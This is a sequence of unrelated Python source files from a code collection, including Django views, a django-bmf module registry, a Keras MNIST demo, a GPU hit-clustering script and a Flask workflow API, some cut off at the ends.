months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
def isLeapYear(year):
return 1 if year % 4 == 0 and year % 100 != 0 or year % 400 == 0 else 0
def getDay(day, month, year):
numDays = 0
# get num days till last year
for y in range(year-1, 1970, -1):
numDays += 365 + isLeapYear(y)
numDays += sum(months[:month-1])
numDays += day
if month > 2:
numDays += isLeapYear(year)
return numDays
k = getDay(6, 6, 2020) # today is saturday
d = getDay(day, month, year)
return days[(d-k)%7]
if __name__ == "__main__":
solution = Solution()
assert solution.dayOfTheWeek(31, 8, 2019) == "Saturday"
assert solution.dayOfTheWeek(18, 7, 1999) == "Sunday"
assert solution.dayOfTheWeek_2(31, 8, 2019) == "Saturday"
assert solution.dayOfTheWeek_2(18, 7, 1999) == "Sunday"
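
    # Optional cross-check against the standard library (illustrative addition, not in
    # the original file): strftime('%A') should agree with both methods under the
    # default C/English locale.
    import datetime
    assert datetime.date(2019, 8, 31).strftime("%A") == "Saturday"
    assert datetime.date(1999, 7, 18).strftime("%A") == "Sunday"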
| StarcoderdataPython |
59113 | <gh_stars>1-10
from django.shortcuts import render
from django.http import HttpResponse
from django.template import RequestContext, loader
from .models import *
def index(request):
# latest_question_list = Question.objects.order_by('-pub_date')[:5]
template = loader.get_template('core/index.html')
context = RequestContext(request)
return HttpResponse(template.render(context))
| StarcoderdataPython |
4808653 | #!/usr/bin/python
# ex:set fileencoding=utf-8:
from __future__ import unicode_literals
from django import forms
from django.apps import apps
from django.conf import settings
from django.conf.urls import patterns, url, include
from django.contrib.admin.sites import AlreadyRegistered
from django.contrib.admin.sites import NotRegistered
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ImproperlyConfigured
from django.db.utils import OperationalError
from django.utils.module_loading import module_has_submodule
from django.utils.module_loading import import_module
from django.utils import six
from django.utils.text import slugify
from .apps import BMFConfig
from .models import Configuration
from .views import ModuleIndexView
from .views import ModuleReportView
from .views import ModuleCreateView
from .views import ModuleDeleteView
from .views import ModuleCloneView
from .views import ModuleAutoDetailView
from .views import ModuleUpdateView
from .views import ModuleWorkflowView
from .views import ModuleFormAPI
import copy
import sys
import logging
logger = logging.getLogger(__name__)
SETTING_KEY = "%s.%s"
APP_LABEL = BMFConfig.label
class DjangoBMFSetting(object):
def __init__(self, app_label, name, field):
self.app_label = app_label
self.name = name
self.field = field
@property
def key(self):
return SETTING_KEY % (self.app_label, self.name)
@property
def required(self):
return self.field.required
@property
def changed(self):
return self.field.initial != self.value
@property
def label(self):
if self.field.label:
return self.field.label
return self.key
@property
def default(self):
return self.field.initial
@property
def value(self):
try:
value = Configuration.objects.get_value(self.app_label, self.name)
except Configuration.DoesNotExist:
value = self.field.initial
return value
class DjangoBMFModule(object):
index = None
create = None
delete = None
update = None
detail = None
report = None
clone = None
urlpatterns = None
def __init__(self, model):
self.model = model
def get_urls(self, **options):
index = self.index or options.get('index', None)
create = self.create or options.get('create', None)
delete = self.delete or options.get('delete', None)
update = self.update or options.get('update', None)
detail = self.detail or options.get('detail', None)
report = self.report or options.get('report', None)
clone = self.clone or options.get('clone', None)
add_patterns = self.urlpatterns or options.get('urlpatterns', None)
urlpatterns = patterns(
'',
url( # TODO: OLD
r'^$',
index.as_view(model=self.model),
name='index',
),
url(
r'^(?P<pk>[0-9]+)/$',
detail.as_view(model=self.model),
name='detail',
),
url(
r'^(?P<pk>[0-9]+)/update/$',
update.as_view(model=self.model),
name='update',
),
url(
r'^(?P<pk>[0-9]+)/delete/$',
delete.as_view(model=self.model),
name='delete',
),
url(
r'^(?P<pk>[0-9]+)/update/form-api/$',
ModuleFormAPI.as_view(
model=self.model,
form_view=update,
),
name='form-api',
),
)
# create view(s)
if isinstance(create, dict):
for label, view in six.iteritems(create):
key = slugify(label)
if isinstance(view, (list, tuple)):
label = view[0]
view = view[1]
self.model._bmfmeta.create_views.append((key, label))
urlpatterns += patterns(
'',
url(
r'^create/(?P<key>%s)/$' % key,
view.as_view(model=self.model),
name='create',
),
url(
r'^create/(?P<key>%s)/form-api/$' % key,
ModuleFormAPI.as_view(
model=self.model,
form_view=view,
),
name='form-api',
),
)
else:
urlpatterns += patterns(
'',
url(
r'^create/$',
create.as_view(model=self.model),
name='create',
),
url(
r'^create/form-api/$',
ModuleFormAPI.as_view(
model=self.model,
form_view=create,
),
name='form-api',
),
)
# workflow interactions
if bool(len(self.model._bmfworkflow._transitions)):
urlpatterns += patterns(
'',
url(
r'^(?P<pk>[0-9]+)/workflow/(?P<transition>\w+)/$',
ModuleWorkflowView.as_view(model=self.model),
name='workflow',
),
)
# model reports
if report:
self.model._bmfmeta.has_report = True
urlpatterns += patterns(
'',
url(
r'^(?P<pk>[0-9]+)/report/$',
report.as_view(model=self.model),
name='report',
),
)
# clone model
if self.model._bmfmeta.can_clone:
urlpatterns += patterns(
'',
url(
r'^(?P<pk>[0-9]+)/clone/$',
clone.as_view(model=self.model),
name='clone',
),
url(
r'^(?P<pk>[0-9]+)/clone/form-api/$',
ModuleFormAPI.as_view(
model=self.model,
form_view=clone,
),
name='clone-form-api',
),
)
# url patterns
if add_patterns:
urlpatterns += add_patterns
return urlpatterns
class DjangoBMFSite(object):
"""
Handle this object like the AdminSite from django.contrib.admin.sites
"""
def __init__(self, name='djangobmf', app_name=APP_LABEL):
self.name = name
self.app_name = app_name
self.clear()
def clear(self):
# combine all registered modules here
self._registry = {}
# all currencies should be stored here
self.currencies = {}
# all reports should be stored here
self.reports = {}
# if a module requires a custom setting, it can be stored here
self.settings = {}
self.settings_valid = False
self.register_settings(APP_LABEL, {
'company_name': forms.CharField(max_length=100, required=True,),
'company_email': forms.EmailField(required=True,),
'currency': forms.CharField(max_length=10, required=True,), # TODO add validation / use dropdown
})
# --- models --------------------------------------------------------------
def register(self, model, admin=None, **options):
self.register_model(model, admin)
for view in ['index', 'create', 'detail', 'update', 'delete', 'report', 'clone']:
if view in options:
self.register_old_view(model, view, options[view])
if 'urlpatterns' in options:
self._registry[model]['urlpatterns'] = options['urlpatterns']
def register_model(self, model, admin=None):
if not hasattr(model, '_bmfmeta'):
raise ImproperlyConfigured(
                'The model %s needs to be a BMF-Model in order to be '
                'registered with django BMF.' % model.__name__
)
if model in self._registry:
raise AlreadyRegistered('The model %s is already registered' % model.__name__)
self._registry[model] = {
'admin': (admin or DjangoBMFModule)(model),
'index': ModuleIndexView,
'create': ModuleCreateView,
'detail': ModuleAutoDetailView,
'update': ModuleUpdateView,
'delete': ModuleDeleteView,
'clone': ModuleCloneView,
'report': None,
'urlpatterns': None,
}
def unregister(self, model):
self.unregister_model(model)
def unregister_model(self, model):
if model not in self._registry:
raise NotRegistered('The model %s is not registered' % model.__name__)
del self._registry[model]
# --- views ---------------------------------------------------------------
def register_old_view(self, model, type, view):
if type in ['index', 'detail', 'update', 'delete', 'clone']:
# TODO check if view is an bmf-view
# add the view
self._registry[model][type] = view
elif type == 'report':
if isinstance(view, bool):
if view:
self._registry[model][type] = ModuleReportView
else:
# TODO check if view is an bmf-view
# add the view
self._registry[model][type] = view
elif type == 'create':
# if isinstance(create, dict):
# TODO check if view is an bmf-view
# add the view
self._registry[model][type] = view
def register_genericview(self, dashboard, category, model, view):
pass
# --- currencies ----------------------------------------------------------
def register_currency(self, currency):
if currency.iso in self.currencies:
raise AlreadyRegistered('The currency %s is already registered' % currency.__name__)
self.currencies[currency.iso] = currency
def unregister_currency(self, currency):
if currency.iso not in self.currencies:
raise NotRegistered('The currency %s is not registered' % currency.__name__)
del self.currencies[currency.iso]
# --- reports -------------------------------------------------------------
def register_report(self, name, cls):
if name in self.reports:
raise AlreadyRegistered('The report %s is already registered' % name)
self.reports[name] = cls
def unregister_report(self, name):
if name not in self.reports:
raise NotRegistered('The currency %s is not registered' % name)
del self.reports[name]
# --- settings ------------------------------------------------------------
def register_settings(self, app_label, settings_dict):
for setting_name, options in settings_dict.items():
self.register_setting(app_label, setting_name, options)
def register_setting(self, app_label, setting_name, options):
name = SETTING_KEY % (app_label, setting_name)
if name in self.settings:
raise AlreadyRegistered('The setting %s is already registered' % name)
self.settings[name] = DjangoBMFSetting(app_label, setting_name, options)
def unregister_setting(self, app_label, setting_name):
name = SETTING_KEY % (app_label, setting_name)
if name not in self.settings:
raise NotRegistered('The setting %s is not registered' % name)
del self.settings[name]
def check_settings(self):
self.settings_valid = False
        for key, setting in self.settings.items():
if not setting.value and setting.field.required:
self.settings_valid = False
return False
return True
def get_lazy_setting(self, app_label, setting_name):
"""
        will always return None if the django apps are not ready
"""
if apps.ready:
return self.get_setting(app_label, setting_name)
return None
def get_setting(self, app_label, setting_name):
name = SETTING_KEY % (app_label, setting_name)
try:
return self.settings[name].value
except KeyError:
raise NotRegistered('The setting %s is not registered' % name)
# --- workspace -----------------------------------------------------------
def register_dashboard(self, dashboard):
obj = dashboard()
label = '%s.%s' % (obj.__module__, obj.__class__.__name__)
workspace = apps.get_model(APP_LABEL, "Workspace")
try:
ws, created = workspace.objects.get_or_create(module=label, level=0)
except OperationalError:
logger.debug('Database not ready, skipping registration of Dashboard %s' % label)
return False
if created or ws.slug != obj.slug or ws.url != obj.slug:
ws.slug = obj.slug
ws.url = obj.slug
ws.editable = False
ws.save()
logger.debug('Dashboard %s registered' % label)
return True
def register_category(self, dashboard, category):
parent = dashboard()
obj = category()
label = '%s.%s' % (obj.__module__, obj.__class__.__name__)
parent_label = '%s.%s' % (parent.__module__, parent.__class__.__name__)
workspace = apps.get_model(APP_LABEL, "Workspace")
try:
parent_workspace = workspace.objects.get(module=parent_label)
except OperationalError:
logger.debug('Database not ready, skipping registration of Category %s' % label)
return False
except workspace.DoesNotExist:
logger.error('%s does not exist - skipping registration of Category %s' % (parent_label, label))
return False
ws, created = workspace.objects \
.select_related('parent') \
.get_or_create(module=label, parent=parent_workspace)
if created or ws.slug != obj.slug or ws.url != ws.get_url():
ws.slug = obj.slug
ws.editable = False
ws.update_url()
ws.save()
logger.debug('Category %s registered' % label)
return True
def register_view(self, model, category, view):
parent = category()
obj = view()
label = '%s.%s' % (obj.__module__, obj.__class__.__name__)
parent_label = '%s.%s' % (parent.__module__, parent.__class__.__name__)
workspace = apps.get_model(APP_LABEL, "Workspace")
try:
parent_workspace = workspace.objects.get(module=parent_label)
except OperationalError:
logger.debug('Database not ready, skipping registration of View %s' % label)
return False
except workspace.DoesNotExist:
logger.error('%s does not exist - skipping registration of View %s' % (parent_label, label))
return False
ct = ContentType.objects.get_for_model(model)
ws, created = workspace.objects \
.select_related('parent') \
.get_or_create(module=label, parent=parent_workspace)
if created or ws.slug != obj.slug or ws.url != ws.get_url() or ws.ct != ct:
ws.ct = ct
ws.slug = obj.slug
ws.editable = False
ws.update_url()
ws.save()
logger.debug('View %s registered' % label)
return True
# --- misc methods --------------------------------------------------------
@property
def is_ready(self):
return apps.get_app_config(APP_LABEL).is_ready
@property
def urls(self):
return self.get_urls(), self.app_name, self.name
@property
def models(self):
models = {}
for model in self._registry:
ct = ContentType.objects.get_for_model(model)
models[ct.pk] = model
return models
def check_dependencies(self):
"""
Check that all things needed to run the admin have been correctly installed.
The default implementation checks that admin and contenttypes apps are
installed, as well as the auth context processor.
"""
# TODO: Check out django's system checks framework and redo checks
# https://docs.djangoproject.com/en/1.7/topics/checks/
if not apps.is_installed('django.contrib.admin'):
raise ImproperlyConfigured(
"Put 'django.contrib.admin' in "
"your INSTALLED_APPS setting in order to use the bmf."
)
if not apps.is_installed('django.contrib.contenttypes'):
raise ImproperlyConfigured(
"Put 'django.contrib.contenttypes' in "
"your INSTALLED_APPS setting in order to use the bmf."
)
if 'django.contrib.auth.context_processors.auth' not in settings.TEMPLATE_CONTEXT_PROCESSORS:
raise ImproperlyConfigured(
"Put 'django.contrib.auth.context_processors.auth' "
"in your TEMPLATE_CONTEXT_PROCESSORS setting in order to use the bmf."
)
def get_urls(self):
from djangobmf.urls import urlpatterns
if not apps.ready and "migrate" in sys.argv:
return urlpatterns
if settings.DEBUG:
self.check_dependencies()
for model in self._registry:
data = self._registry[model]
urls = data['admin'].get_urls(**{
"index": data['index'],
"create": data['create'],
"detail": data['detail'],
"update": data['update'],
"delete": data['delete'],
"report": data['report'],
"clone": data['clone'],
"urlpatterns": data['urlpatterns'],
})
info = (model._meta.app_label, model._meta.model_name)
urlpatterns += patterns(
'',
url(
r'^module/%s/%s/' % (info[1], info[0]),
include((urls, self.app_name, "module_%s_%s" % info))
)
)
return urlpatterns
site = DjangoBMFSite()
def autodiscover():
for app_config in apps.get_app_configs():
try:
# get a copy of old site configuration
before_import_r = copy.copy(site._registry)
before_import_c = copy.copy(site.currencies)
before_import_s = copy.copy(site.settings)
before_import_p = copy.copy(site.reports)
import_module('%s.%s' % (app_config.name, "bmf_module"))
except:
# Reset the model registry to the state before the last import
            # skipping this may result in an AlreadyRegistered error
site._registry = before_import_r
site.currencies = before_import_c
site.settings = before_import_s
site.reports = before_import_p
# Decide whether to bubble up this error
if module_has_submodule(app_config.module, "bmf_module"):
raise
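
# Illustrative registration sketch (not part of the original file). In a real project
# the calls below would live in an app's `bmf_module.py` so that `autodiscover()`
# picks them up; `MyModel` and `MyUpdateView` are placeholder names.
#
#   site.register(MyModel, update=MyUpdateView)
#   site.register_setting("myapp", "default_currency",
#                         forms.CharField(max_length=10, required=False))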
| StarcoderdataPython |
3307911 | <gh_stars>0
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: <NAME>
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
##
# uengine is deprecated and will be removed from the system soon. Migrate your
# apps to using the Data Access Framework (DAF).
##
from java.util import ArrayList
from com.raytheon.uf.common.message.response import ResponseMessageGeneric
from com.raytheon.uf.edex.database.plugin import PluginFactory
from com.raytheon.edex.uengine.tasks.query import TableQuery
from gov.noaa.nws.ncep.edex.uengine.utility import GempakConvert
class GempakEnsembleTemplateGenerator():
def __init__(self, pluginName):
self.pluginName = pluginName
self.eventName = None
self.perturbationNum = 0
#
# create the TableQuery instance
#
try:
className = PluginFactory.getInstance().getPluginRecordClassName(pluginName)
except:
#
# handle the exception if the plugin record class cannot be found
#
message = "RunTimeError getting the PluginRecordClassName for " + \
pluginName + " "
import sys
if sys.exc_info()[1] is not None:
str = "%s" % sys.exc_info()[1]
indx = str.find("\n")
if indx > 0:
message = message + str[:indx]
print "Unexpected error:" + message
return self.__makeNullResponse(message)
databaseName = "metadata"
#
# create the TableQuery instance for specified database
# and plugin record class
#
self.query = TableQuery(databaseName,className)
self.query.setDistinctField("eventName")
def setEnsembleName(self, modelName):
self.modelName = modelName
self.query.addParameter ("modelName", modelName)
def setEnsembleEventName(self, eventName):
self.eventName = eventName
self.query.addParameter ("eventName", eventName)
def setEnsemblePerturbationNumber(self, perturbationNum):
self.perturbationNum = perturbationNum
self.query.addParameter ("modelInfo.perturbationNumber", perturbationNum)
def execute(self):
#
# execute the set query
#
try:
queryResult = ArrayList()
queryResult = self.query.execute()
# print "queryResult = ", queryResult
except:
message = "RunTimeError executing TableQuery "
import sys
if sys.exc_info()[1] is not None:
str = "%s" % sys.exc_info()[1]
indx = str.find("\n")
if indx > 0:
message = message + str[:indx]
print "Unexpected error:" + message
return self.__makeNullResponse(message)
#
# process the results of the query
#
if queryResult is None:
return self.__makeNullResponse("Query returned no results")
else:
return self.__makeResponse(queryResult)
def __makeResponse(self, ensArrayList):
size = ensArrayList.size()
ensList = []
for i in range(size):
ensList.append("%s" % ensArrayList.get(i))
commonStart = self.__findCommonStart(ensList)
# print "commonStart= ", commonStart
# if self.perturbationNum == 0:
# ensTemplate = self.modelName + "_db_" + commonStart + "*_YYYYMMDDHHfFFF"
# else:
ensTemplate = self.modelName + "_db_" + commonStart + "_YYYYMMDDHHfFFF"
response = ArrayList()
response.add(ResponseMessageGeneric(ensTemplate))
return response
def __makeNullResponse(self, aMessage=None):
return ResponseMessageGeneric(aMessage)
def __findCommonStart (self, strlist):
strlist = strlist[:]
prev = None
while True:
common = self.__getCommonLetters(strlist)
if common == prev:
break
strlist.append(common)
prev = common
return self.__getCommonLetters(strlist)
def __getCommonLetters(self, strlist):
return ''.join([x[0] for x in zip(*strlist) \
if reduce(lambda a,b:(a == b) and a or None,x)]) | StarcoderdataPython |
1779427 | #!/usr/bin/env python
import sys
import os
sys.path.append(os.getcwd())
import cpmsparse.util as util
from cpmsparse.kernels import PatternSparse, CpmSparse
import pandas as pd
import numpy as np
group_id = 'g8788' # event hits: 130
print("We're good to go!")
context, cc = util.init_pycuda()
# Load data
N, x, y, z, ct = util.get_real_input_data(f"sample_data/sample_{group_id}.csv")
print("Read", N, "hits from file")
# Load Pattern Matrix
pattern_file = 'pattern_mtx_50_50_100_100.csv'
pattern = np.loadtxt(open(pattern_file, "rb"), delimiter=",")
pattern = np.array(pattern.flatten()).astype(np.float32)
# Correlation criterion
pattern_threshold = 0.01 # the pattern correlation threshold [percent]
pattern_time_bin_count = 50 # number of bins for time domain
pattern_dist_bin_count = 50 # number of bins for distance domain
pattern_time_limit = 100 # pattern time limit - the time multiplied by the speed of light [meters]
pattern_dist_limit = 100 # pattern distance limit [meters]
pattern_kernel = PatternSparse(N, cc=cc,
ptt_threshold=pattern_threshold,
ptt_time_bin_count=pattern_time_bin_count,
ptt_dist_bin_count=pattern_dist_bin_count,
ptt_time_limit=pattern_time_limit,
ptt_dist_limit=pattern_dist_limit)
d_col_idx, d_prefix_sums, d_degrees, total_hits = pattern_kernel.compute(N, x, y, z, ct, pattern)
# Community detection and classification
cpm_resolution = 0.1 # CPM resolution parameter
cpm_kernel = CpmSparse(N, cc=cc)
classified_hits = cpm_kernel.compute(d_col_idx, d_prefix_sums, cpm_resolution)
print("Number of classified hits: ", classified_hits)
| StarcoderdataPython |
23828 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
import json
from django import forms
from common.forms import BaseComponentForm, TypeCheckField
from components.component import Component
from .toolkit import configs
class GetHostList(Component):
"""
apiLabel get host list
apiMethod GET
### Functional Description
Get host list
### Request Parameters
{{ common_args_desc }}
#### Interface Parameters
| Field | Type | Required | Description |
|-----------|------------|--------|------------|
| app_id | int | Yes | Business ID |
| ip_list | array | No | Host IP address, including ip and bk_cloud_id, bk_cloud_id represents cloud area ID |
### Request Parameters Example
```python
{
"bk_app_code": "esb_test",
"bk_app_secret": "xxx",
"bk_token": "<PASSWORD>",
"bk_biz_id": 1,
"ip_list": [
{
"ip": "10.0.0.1",
"bk_cloud_id": 0
},
{
"ip": "10.0.0.2"
"bk_cloud_id": 0
}
]
}
```
### Return Result Example
```python
{
"result": true,
"code": 0,
"message": "",
"data": [
{
"inner_ip": "10.0.0.1",
"bk_cloud_id": 0,
"host_name": "db-1",
"maintainer": "admin"
},
{
"inner_ip": "10.0.0.2",
"bk_cloud_id": 2,
"host_name": "db-2",
"maintainer": "admin"
}
]
}
```
"""
# Name of the system to which the component belongs
sys_name = configs.SYSTEM_NAME
# Form Processing Parameters Validation
class Form(BaseComponentForm):
bk_biz_id = forms.CharField(label='Business ID', required=True)
ip_list = TypeCheckField(label='Host IP address', promise_type=list, required=False)
# The data returned in clean method is available through the component's form_data property
def clean(self):
            return self.get_cleaned_data_when_exist(keys=['bk_biz_id', 'ip_list'])
# Component Processing Access
def handle(self):
# Get the data processed in Form clean
data = self.form_data
# Set Current Operator
data['operator'] = self.current_user.username
# Request System Interface
try:
response = self.outgoing.http_client.post(
host=configs.host,
path='/hcp/get_host_list/',
data=json.dumps(data),
)
except Exception:
# TODO: To delete, only fake data for testing
response = {
'code': 0,
'data': [
{
'inner_ip': '10.0.0.1',
'bk_cloud_id': 0,
'host_name': 'just_for_test',
'maintainer': 'admin',
},
]
}
# Analyze the Results
code = response['code']
if code == 0:
result = {
'result': True,
'data': response['data'],
}
else:
result = {
'result': False,
'message': response['message']
}
# Set the component return result, and payload is the actual return result of component
self.response.payload = result
| StarcoderdataPython |
71483 | <filename>pythx/middleware/group_data.py<gh_stars>10-100
"""This module contains a middleware to fill the :code:`groupId`/:code:`groupName`
field."""
import logging
from typing import Dict
from pythx.types import RESPONSE_MODELS, REQUEST_MODELS
from pythx.middleware.base import BaseMiddleware
LOGGER = logging.getLogger("GroupDataMiddleware")
class GroupDataMiddleware(BaseMiddleware):
"""This middleware fills the :code:`groupId` and :code:`groupName` fields
when submitting a new analysis job.
This means that only :code:`process_request` carries business logic, while
:code:`process_response` returns the input response object right away without touching it.
"""
def __init__(self, group_id: str = None, group_name: str = None):
LOGGER.debug("Initializing")
self.group_id = group_id
self.group_name = group_name
def process_request(self, req: REQUEST_MODELS) -> Dict:
"""Add the :code:`groupId` and/or :code:`groupName` field if the
request we are making is the submission of a new analysis job.
Because we execute the middleware on the request data dictionary, we cannot simply
match the domain model type here. However, based on the endpoint and the request
method we can determine that a new job has been submitted. In any other case, we
return the request right away without touching it.
:param req: The request's data dictionary
:return: The request's data dictionary, optionally with the group data field(s) filled in
"""
if not (req["method"] == "POST" and req["url"].endswith("/analyses")):
return req
if self.group_id:
LOGGER.debug("Adding group ID %s to request", self.group_id)
req["payload"]["groupId"] = self.group_id
if self.group_name:
LOGGER.debug("Adding group name %s to request", self.group_name)
req["payload"]["groupName"] = self.group_name
return req
def process_response(self, resp: RESPONSE_MODELS) -> RESPONSE_MODELS:
"""This method is irrelevant for adding our group data, so we don't do
anything here.
We still have to define it, though. Otherwise when calling the abstract base class'
:code:`process_response` method, we will encounter an exception.
:param resp: The response domain model
:return: The very same response domain model
"""
LOGGER.debug("Forwarding the response without any action")
return resp
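
# Illustrative standalone sketch (not part of the original file): the middleware only
# touches requests that submit a new analysis (POST to a URL ending in /analyses).
if __name__ == "__main__":
    mw = GroupDataMiddleware(group_id="1234", group_name="nightly-ci")
    req = {"method": "POST", "url": "https://api.example.com/v1/analyses", "payload": {}}
    print(mw.process_request(req)["payload"])  # {'groupId': '1234', 'groupName': 'nightly-ci'}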
| StarcoderdataPython |
1684593 | <reponame>maykinmedia/maykin-email-templates
from django.http import HttpResponse
from django.views.generic import View
from .utils import variable_help_text
class TemplateVariableView(View):
def get(self, request, *args, **kwargs):
variables = variable_help_text(kwargs.get('template_type'))
return HttpResponse(variables)
| StarcoderdataPython |
3343919 | <reponame>LeWeis/captcha-break
# coding=utf-8
from __future__ import print_function
from gen.gen_captcha import gen_dataset, load_templates
import cPickle as pickle
from PIL import Image
import numpy as np
from gen.utils import vec2str
def check_dataset(dataset, labels, index):
data = np.uint8(dataset[index]).reshape((40, 100)) * 255
im = Image.fromarray(data)
im.show()
print("label:", vec2str(labels[index]))
if __name__ == '__main__':
templates = load_templates()
dataset, labels = gen_dataset(1, templates) # generate one image
check_dataset(dataset, labels, 0)
| StarcoderdataPython |
3269348 | <filename>tests/scidash/tests/observations.py
"""Observations (experimental facts) used to parameterize tests"""
import os, sys
import quantities as pq
import django
path = os.path.realpath(__file__)
for i in range(4):
path = os.path.split(path)[0]
CW_HOME = path
sys.path.append(CW_HOME)
sys.path.append(os.path.join(CW_HOME,'channelworm')) # Path to 'web_app'
os.environ.setdefault(
"DJANGO_SETTINGS_MODULE",
"web_app.settings"
)
django.setup()
from django.conf import settings
settings.DEBUG = False
# Must be imported after Django setup
from channelworm.ion_channel.models import GraphData
def iv(doi,fig):
sample_data = GraphData.objects.get(graph__experiment__reference__doi=doi,
graph__figure_ref_address=fig)
obs = list(zip(*sample_data.asarray()))
iv = {'i/C':obs[1]*pq.A/pq.F, 'v':obs[0]*pq.mV}
cell_capacitance = 1e-13 * pq.F # Capacitance is arbitrary if IV curves are scaled.
iv['i'] = iv['i/C']*cell_capacitance
return iv
egl19_iv = iv('10.1083/jcb.200203055','2B')
slo2_iv = iv('10.1113/jphysiol.2010.200683','7B') | StarcoderdataPython |
3372131 | from keras import layers
from keras import models
from keras.datasets import mnist
from keras.utils import to_categorical
import tensorflow as tf
import os
import contextlib
import datetime
# @contextlib.contextmanager
# def options(options):
# old_opts = tf.config.optimizer.get_experimental_options()
# tf.config.optimizer.set_experimental_options(options)
# try:
# yield
# finally:
# tf.config.optimizer.set_experimental_options(old_opts)
if __name__ == '__main__':
# os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
os.environ["XLA_FLAGS"] = '--xla_gpu_cuda_data_dir="D:/Program Files/CUDA/v11.2/development"'
os.environ["TF_GPU_THREAD_MODE"] = 'gpu_private'
physical_devices = tf.config.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True) # important!
# tf.config.experimental.enable_mlir_bridge()
# tf.config.experimental.enable_mlir_graph_optimization()
tf.config.optimizer.set_jit(True)
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(10, activation='softmax'))
model.summary()
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
train_images = train_images.reshape((60000, 28, 28, 1))
train_images = train_images.astype('float32') / 255
test_images = test_images.reshape((10000, 28, 28, 1))
test_images = test_images.astype('float32') / 255
train_labels = to_categorical(train_labels)
test_labels = to_categorical(test_labels)
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
# with options({'constant_folding': True, 'debug_stripper': True}):
# print(tf.config.optimizer.get_experimental_options())
logdir = os.path.join("logs", datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(logdir, histogram_freq=1, profile_batch = '500,520')
model.fit(train_images, train_labels, epochs=5, batch_size=64, callbacks=[tensorboard_callback])
test_loss, test_acc = model.evaluate(test_images, test_labels)
print(f'Test Accuracy: {test_acc}')
print(f'Test Loss: {test_loss}')
print('Demo finished')
| StarcoderdataPython |
1669599 | from django.db import models
from django.contrib.auth.models import AbstractUser, UserManager
# Create your models here.
| StarcoderdataPython |
163706 | <reponame>eubr-bigsea/tahiti
# -*- coding: utf-8 -*-}
import logging
import os
import uuid
import requests
from flask import request, current_app, g
from flask_babel import gettext
from flask_restful import Resource
from sqlalchemy import or_
from sqlalchemy.orm import joinedload
from sqlalchemy.sql.elements import and_
from marshmallow.exceptions import ValidationError
from tahiti.app_auth import requires_auth
from tahiti.schema import *
log = logging.getLogger(__name__)
def optimize_workflow_query(workflows):
return workflows \
.options(joinedload('tasks')) \
.options(joinedload('tasks.operation')) \
.options(joinedload('tasks.operation.current_translation')) \
.options(joinedload('platform')) \
.options(joinedload('platform.current_translation')) \
.options(joinedload('flows'))
def update_port_name_in_flows(session, workflow_id):
sql = """
UPDATE flow, operation_port s, operation_port t,
operation_port_translation t1, operation_port_translation t2
SET source_port_name = t1.name, target_port_name = t2.name
WHERE flow.source_port = s.id AND flow.target_port = t.id
AND s.id = t1.id AND t.id = t2.id
AND workflow_id = :id"""
session.execute(sql, {'id': workflow_id})
def get_workflow(workflow_id):
workflows = optimize_workflow_query(
Workflow.query.filter_by(id=workflow_id).order_by(
Workflow.name))
workflows = filter_by_permissions(
workflows, list(PermissionType.values()))
workflows = workflows.options(
joinedload('tasks.operation.forms')).options(
joinedload('tasks.operation.forms')).options(
joinedload('tasks.operation.forms.fields'))
workflow = workflows.first()
if workflow is not None:
# Set the json form for operations
for task in workflow.tasks:
current_form = json.loads(task.forms) if task.forms else {}
if task.operation:
for form in task.operation.forms:
for field in form.fields:
if field.name not in current_form:
current_form[field.name] = {
'value': field.default}
db.session.expunge(task) # in order to avoid unnecessary updates
task.forms = json.dumps(current_form)
return workflow
def filter_by_permissions(workflows, permissions, consider_public=True):
if g.user.id not in (0, 1): # It is not a inter service call
sub_query = WorkflowPermission.query.with_entities(
WorkflowPermission.workflow_id).filter(
WorkflowPermission.permission.in_(permissions),
WorkflowPermission.user_id == g.user.id)
conditions = [
Workflow.user_id == g.user.id,
Workflow.id.in_(sub_query)
]
if consider_public:
conditions.append(Workflow.is_public)
workflows = workflows.filter(or_(*conditions))
return workflows
def test_and_apply_filter(request, arg, workflow, condition):
result = workflow
value = request.args.get(arg)
if value:
result = workflow.filter(condition(value))
return result
class WorkflowListApi(Resource):
""" REST API for listing class Workflow """
@staticmethod
@requires_auth
def get():
workflows = Workflow.query
try:
if request.args.get('fields'):
only = [x.strip() for x in
request.args.get('fields').split(',')]
else:
only = ('id', 'name', 'platform.id', 'permissions')
workflows = test_and_apply_filter(request, 'platform', workflows,
lambda v: Workflow.platform.has(slug=v))
# platform = request.args.get('platform', None)
# if platform:
# workflows = workflows.filter(
# Workflow.platform.has(slug=platform))
workflows = test_and_apply_filter(request, 'track', workflows,
lambda v: Workflow.publishing_enabled == (v != 'false'))
workflows = test_and_apply_filter(request, 'published', workflows,
